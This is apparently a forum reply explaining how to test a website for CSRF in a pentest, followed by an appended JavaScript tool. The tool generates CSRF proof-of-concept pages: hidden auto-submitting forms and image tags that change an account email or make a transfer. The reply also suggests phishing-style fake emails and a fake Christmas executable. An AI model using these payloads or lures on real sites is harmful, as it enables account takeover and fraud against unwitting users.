Hi Hordakk, long time no see!
I did a similar test about 3 months ago. Sorry, I am currently in a rush; I will try to add more details later. The way I approached it was in two parts:
A) Figuring out requests between the browser and the server
- Create an account on the tested web site;
- While trying all possible scenarios, sniff every single request and response between your browser and the server.
B) Figuring out how the session is managed
- Are they using "anti-CSRF" techniques?
- If not, try to craft a single URL (usually quite complex) that reproduces each functionality found in step A). Then execute them on your logged-in machine.
- If at least one crafted URL succeeds, you have just found a CSRF vulnerability.
- Finally, just draft a fake email that demonstrates how a user could click on a link and trigger some activity on the web server. You can also add your URL in a fake Christmas executable (dancing Santa, etc.) or something like that.
CSRF examples almost always use money transfer or things like that. A CSRF vulnerability could be as simple as logging the user out or just changing the way things are displayed. But everything found in a pentest is valuable for the client. They will be scared to "miss" something bigger next time...
And all this was achieved in a Black Box pentest, without really involving social engineering (because you can test it yourself).
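The two-step procedure above (sniff the requests, then check for anti-CSRF tokens and craft a URL per function) as an added worked example; this is not code from the post or its author. It takes requests captured in step A), flags parameters that look like anti-CSRF tokens (step B), and builds the proof-of-concept: a crafted URL for GET requests, and, going slightly beyond the single-URL approach in the post, an auto-submitting form for POST requests. The request shape, the hostname `example.test`, the sample requests and the token heuristic are all constructed assumptions.

```javascript
// Added example (not from the original post). Builds a CSRF proof-of-concept
// from requests captured while sniffing browser/server traffic, and reports
// any parameter that looks like an anti-CSRF token. Request shape, hostname
// and sample data are hypothetical, constructed for this example.

const TOKEN_NAME = /csrf|xsrf|token|nonce|authenticity|verif/i;

// Heuristic: a parameter is probably an anti-CSRF token if its name says so,
// or its value is a long random-looking string (letters and digits, >= 16 chars).
function looksLikeCsrfToken(name, value) {
  if (TOKEN_NAME.test(name)) return true;
  return value.length >= 16 &&
    /^[A-Za-z0-9+/=_.:-]+$/.test(value) &&
    /[0-9]/.test(value) && /[A-Za-z]/.test(value);
}

// Names of the captured parameters that look like anti-CSRF tokens.
function findCsrfTokens(request) {
  return Object.entries(request.params)
    .filter(([name, value]) => looksLikeCsrfToken(name, String(value)))
    .map(([name]) => name);
}

// GET requests: one crafted URL carrying every parameter, which can go straight
// into a link, an <img src>, or the fake email described in the post.
function buildCsrfUrl(request) {
  const url = new URL(request.url);
  for (const [name, value] of Object.entries(request.params)) {
    url.searchParams.set(name, value);
  }
  return url.toString();
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Build the proof-of-concept page: a 1x1 image for GET, or a hidden form that
// submits itself on load for POST. Requests carrying a token-like parameter are
// still built (the token may be unchecked server-side) but are reported.
function buildCsrfPoc(request) {
  const method = request.method.toUpperCase();
  const tokens = findCsrfTokens(request);
  let html;
  if (method === 'GET') {
    html = `<img src="${escapeHtml(buildCsrfUrl(request))}" width="1" height="1">`;
  } else {
    const inputs = Object.entries(request.params)
      .map(([n, v]) => `  <input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
      .join('\n');
    html = `<form id="csrf" method="POST" action="${escapeHtml(request.url)}">\n${inputs}\n</form>\n` +
      `<script>document.getElementById("csrf").submit();</script>`;
  }
  return { html, tokens, likelyProtected: tokens.length > 0 };
}

// Constructed sample of requests "captured" in step A) (hypothetical site).
const CAPTURED = [
  { name: 'change-email', method: 'POST', url: 'https://example.test/account/email',
    params: { email: 'attacker@example.test' } },
  { name: 'transfer', method: 'POST', url: 'https://example.test/transfer',
    params: { to: 'attacker', amount: '100', _csrf: 'Zt8q1LmVx9Kp2RwS4bNd' } },
  { name: 'logout', method: 'GET', url: 'https://example.test/logout', params: {} },
];

function main() {
  for (const req of CAPTURED) {
    const poc = buildCsrfPoc(req);
    const status = poc.likelyProtected
      ? `token-like parameter(s): ${poc.tokens.join(', ')}`
      : 'no anti-CSRF token seen';
    console.log(`--- ${req.name} (${req.method}): ${status}`);
    console.log(poc.html);
  }
}

main();
```

Each generated page is loaded while logged in to the target (as in the post); if the action goes through, that request is CSRF-able. A flagged token is only a hint: the server may not actually validate it, so the PoC is worth running with the token removed or altered as well.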